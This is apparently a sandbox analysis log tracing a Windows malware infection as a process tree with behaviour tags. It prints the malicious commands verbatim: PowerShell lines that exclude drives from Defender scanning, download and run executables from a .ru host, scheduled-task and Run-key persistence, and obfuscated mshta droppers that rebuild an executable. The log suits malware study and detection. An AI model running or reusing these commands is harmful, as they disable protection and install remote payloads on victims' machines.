C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://fortnightgalaxyswapper.ru/sold.exe', (Join-Path -Path $env:AppData -ChildPath 'sold.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://fortnightgalaxyswapper.ru/Amongus.exe', (Join-Path -Path $env:UserProfile -ChildPath 'Amongus.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'sold.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:UserProfile -ChildPath 'Amongus.exe')" & exit10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4740 -s 222812⤵
- Program crash
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 225612⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "(New-Object System.Net.WebClient).DownloadFile('https://fortnightgalaxyswapper.ru/sold.exe', (Join-Path -Path $env:AppData -ChildPath 'sold.exe'))"11⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "(New-Object System.Net.WebClient).DownloadFile('https://fortnightgalaxyswapper.ru/Amongus.exe', (Join-Path -Path $env:UserProfile -ChildPath 'Amongus.exe'))"11⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'sold.exe')"11⤵
-
C:\Users\Admin\AppData\Roaming\sold.exe"C:\Users\Admin\AppData\Roaming\sold.exe"12⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\sold.exe"13⤵
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"14⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"15⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services32.exe"14⤵
-
C:\Windows\system32\services32.exeC:\Windows\system32\services32.exe15⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"16⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"17⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost32"18⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "Start-Process -FilePath (Join-Path -Path $env:UserProfile -ChildPath 'Amongus.exe')"11⤵
-
C:\Users\Admin\Amongus.exe"C:\Users\Admin\Amongus.exe"12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\okMapBnuwoKkFkv6DNJnxaAd.exe"C:\Users\Admin\Pictures\Adobe Films\okMapBnuwoKkFkv6DNJnxaAd.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\MSMT3yGmzXPkyNGU4Ioc_cX7.exe"C:\Users\Admin\Pictures\Adobe Films\MSMT3yGmzXPkyNGU4Ioc_cX7.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\qWZSTdOhU4VG7egnd7FPanGp.exe"C:\Users\Admin\Pictures\Adobe Films\qWZSTdOhU4VG7egnd7FPanGp.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 2408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\FOGl6ElFqFbTpkovg9hhVPi3.exe"C:\Users\Admin\Pictures\Adobe Films\FOGl6ElFqFbTpkovg9hhVPi3.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 2368⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\o9uSZntIwqe93u3YXgjwODAp.exe"C:\Users\Admin\Pictures\Adobe Films\o9uSZntIwqe93u3YXgjwODAp.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\X4IAaOgGcZikswnm7TOgIOSW.exe"C:\Users\Admin\Documents\X4IAaOgGcZikswnm7TOgIOSW.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\hSVVqJwu9dgzLuTpwGyxJgix.exe"C:\Users\Admin\Pictures\Adobe Films\hSVVqJwu9dgzLuTpwGyxJgix.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\0GGbjtnpTTrbzG7u2or4q7_l.exe"C:\Users\Admin\Pictures\Adobe Films\0GGbjtnpTTrbzG7u2or4q7_l.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\0GGbjtnpTTrbzG7u2or4q7_l.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\0GGbjtnpTTrbzG7u2or4q7_l.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\0GGbjtnpTTrbzG7u2or4q7_l.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\0GGbjtnpTTrbzG7u2or4q7_l.exe" ) do taskkill -f -iM "%~NxM"11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "0GGbjtnpTTrbzG7u2or4q7_l.exe"12⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\dPDD1_x1AYINcoVmULBbF_RG.exe"C:\Users\Admin\Pictures\Adobe Films\dPDD1_x1AYINcoVmULBbF_RG.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 174410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\KngXFzzriYmz7oZXLnNJ7Oje.exe"C:\Users\Admin\Pictures\Adobe Films\KngXFzzriYmz7oZXLnNJ7Oje.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 23610⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\qMMgF0iy9oz3KXaRZNQHcx4E.exe"C:\Users\Admin\Pictures\Adobe Films\qMMgF0iy9oz3KXaRZNQHcx4E.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7560 -s 23610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\FBowEu9d0daGixRU4W9LGBHi.exe"C:\Users\Admin\Pictures\Adobe Films\FBowEu9d0daGixRU4W9LGBHi.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\jfn8vpxKNthDu5DnWkBIAFRS.exe"C:\Users\Admin\Pictures\Adobe Films\jfn8vpxKNthDu5DnWkBIAFRS.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff86290dec0,0x7ff86290ded0,0x7ff86290dee012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --mojo-platform-channel-handle=1960 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1580 /prefetch:212⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --mojo-platform-channel-handle=2072 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2508 /prefetch:112⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2516 /prefetch:112⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3224 /prefetch:212⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --mojo-platform-channel-handle=1732 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --mojo-platform-channel-handle=3588 /prefetch:812⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --mojo-platform-channel-handle=3360 /prefetch:812⤵
  - Loads dropped DLL
  - Adds Run key to start application
- [depth 12] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --mojo-platform-channel-handle=2076 /prefetch:8
- [depth 12] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15032208555041387487,4842627465854870280,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4176_232814488" --mojo-platform-channel-handle=1896 /prefetch:8
- [depth 9] C:\Users\Admin\Pictures\Adobe Films\EfZylDS8gnimdLu50tagoPKK.exe
  "C:\Users\Admin\Pictures\Adobe Films\EfZylDS8gnimdLu50tagoPKK.exe"
- [depth 10] C:\Users\Admin\AppData\Local\Temp\is-ISJSU.tmp\EfZylDS8gnimdLu50tagoPKK.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-ISJSU.tmp\EfZylDS8gnimdLu50tagoPKK.tmp" /SL5="$2046E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\EfZylDS8gnimdLu50tagoPKK.exe"
  - Loads dropped DLL
- [depth 8] C:\Windows\SysWOW64\schtasks.exe
  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
  - Creates scheduled task(s)
- [depth 8] C:\Windows\SysWOW64\schtasks.exe
  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
  - Creates scheduled task(s)
- [depth 7] C:\Users\Admin\Pictures\Adobe Films\LRSqKfZCaNZ_zXzXGAw7tCbk.exe
  "C:\Users\Admin\Pictures\Adobe Films\LRSqKfZCaNZ_zXzXGAw7tCbk.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
- [depth 8] C:\Users\Admin\Pictures\Adobe Films\LRSqKfZCaNZ_zXzXGAw7tCbk.exe
  "C:\Users\Admin\Pictures\Adobe Films\LRSqKfZCaNZ_zXzXGAw7tCbk.exe"
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
- [depth 7] C:\Users\Admin\Pictures\Adobe Films\qm3T17zb2S0FFFQu0bRAfL_O.exe
  "C:\Users\Admin\Pictures\Adobe Films\qm3T17zb2S0FFFQu0bRAfL_O.exe"
  - Executes dropped EXE
- [depth 8] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 240
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
- [depth 7] C:\Users\Admin\Pictures\Adobe Films\LF6wUUS4Bh5t4GsH_50X1G6X.exe
  "C:\Users\Admin\Pictures\Adobe Films\LF6wUUS4Bh5t4GsH_50X1G6X.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
- [depth 7] C:\Users\Admin\Pictures\Adobe Films\UHmIhzTPjA7Udq7mHDS7iVT8.exe
  "C:\Users\Admin\Pictures\Adobe Films\UHmIhzTPjA7Udq7mHDS7iVT8.exe"
- [depth 7] C:\Users\Admin\Pictures\Adobe Films\t2RSCnrA9J7oKhlzpAzxT6n3.exe
  "C:\Users\Admin\Pictures\Adobe Films\t2RSCnrA9J7oKhlzpAzxT6n3.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
- [depth 7] C:\Users\Admin\Pictures\Adobe Films\F_Evme4OtUMIPukX3RuShUdN.exe
  "C:\Users\Admin\Pictures\Adobe Films\F_Evme4OtUMIPukX3RuShUdN.exe"
- [depth 8] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\F_Evme4OtUMIPukX3RuShUdN.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\F_Evme4OtUMIPukX3RuShUdN.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
- [depth 9] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\F_Evme4OtUMIPukX3RuShUdN.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\F_Evme4OtUMIPukX3RuShUdN.exe" ) do taskkill -im "%~NxK" -F
- [depth 10] C:\Windows\SysWOW64\taskkill.exe
  taskkill -im "F_Evme4OtUMIPukX3RuShUdN.exe" -F
  - Kills process with taskkill
- [depth 10] C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
  8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
- [depth 11] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
- [depth 12] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
- [depth 11] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
- [depth 12] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
- [depth 13] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
- [depth 13] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" EcHO "
  - Blocklisted process makes network request
- [depth 13] C:\Windows\SysWOW64\msiexec.exe
  msiexec.exe -y .\N3V4H8H.SXY
- [depth 7] C:\Users\Admin\Pictures\Adobe Films\WTkq_9ecc7BH3DTIjhrTRzAW.exe
  "C:\Users\Admin\Pictures\Adobe Films\WTkq_9ecc7BH3DTIjhrTRzAW.exe"
  - Executes dropped EXE
  - Loads dropped DLL
- [depth 5] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Sat01d42d6cf82db.exe
- [depth 6] C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01d42d6cf82db.exe
  Sat01d42d6cf82db.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
- [depth 7] C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01d42d6cf82db.exe
  C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01d42d6cf82db.exe
  - Executes dropped EXE
- [depth 5] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Sat01c0e0d4fbb2ea73.exe
- [depth 6] C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01c0e0d4fbb2ea73.exe
  Sat01c0e0d4fbb2ea73.exe
  - Executes dropped EXE
- [depth 5] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Sat01519886887.exe
- [depth 6] C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01519886887.exe
  Sat01519886887.exe
  - Executes dropped EXE
- [depth 5] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Sat01c5002407.exe
- [depth 5] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Sat0119f3e03c741b02f.exe
- [depth 6] C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat0119f3e03c741b02f.exe
  Sat0119f3e03c741b02f.exe
  - Executes dropped EXE
- [depth 5] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Sat01688f54435b6.exe
- [depth 6] C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01688f54435b6.exe
  Sat01688f54435b6.exe
  - Executes dropped EXE
- [depth 5] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Sat018ad0a25a7faa.exe
- [depth 5] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Sat01f932a994dbc6.exe
- [depth 6] C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01f932a994dbc6.exe
  Sat01f932a994dbc6.exe
  - Executes dropped EXE
- [depth 7] C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01f932a994dbc6.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01f932a994dbc6.exe" -u
  - Executes dropped EXE
- [depth 5] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Sat01e3b3e0fa80800c.exe
- [depth 2] C:\Windows\SysWOW64\cmstp.exe
  "C:\Windows\SysWOW64\cmstp.exe"
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Modifies Internet Explorer settings
  - Suspicious behavior: MapViewOfSection
- [depth 3] C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\Pictures\Adobe Films\okMapBnuwoKkFkv6DNJnxaAd.exe"
- [depth 2] C:\Users\Admin\AppData\Local\Temp\D6C9.exe
  C:\Users\Admin\AppData\Local\Temp\D6C9.exe
  - Suspicious use of SetThreadContext
- [depth 3] C:\Users\Admin\AppData\Local\Temp\D6C9.exe
  C:\Users\Admin\AppData\Local\Temp\D6C9.exe
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
- [depth 2] C:\Users\Admin\AppData\Local\Temp\9D1.exe
  C:\Users\Admin\AppData\Local\Temp\9D1.exe
- [depth 2] C:\Users\Admin\AppData\Local\Temp\1386.exe
  C:\Users\Admin\AppData\Local\Temp\1386.exe
- [depth 3] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 280
  - Program crash
- [depth 2] C:\Users\Admin\AppData\Local\Temp\52B3.exe
  C:\Users\Admin\AppData\Local\Temp\52B3.exe
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
- [depth 2] C:\Users\Admin\AppData\Local\Temp\569C.exe
  C:\Users\Admin\AppData\Local\Temp\569C.exe
  - Windows security modification
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  - System policy modification
- [depth 3] C:\Users\Admin\AppData\Local\Temp\f37888c9-9b29-4739-ae22-503de57e652d\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\f37888c9-9b29-4739-ae22-503de57e652d\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\f37888c9-9b29-4739-ae22-503de57e652d\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
- [depth 4] C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f37888c9-9b29-4739-ae22-503de57e652d\test.bat"
- [depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\569C.exe" -Force
- [depth 4] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 2292
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
- [depth 3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
- [depth 4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
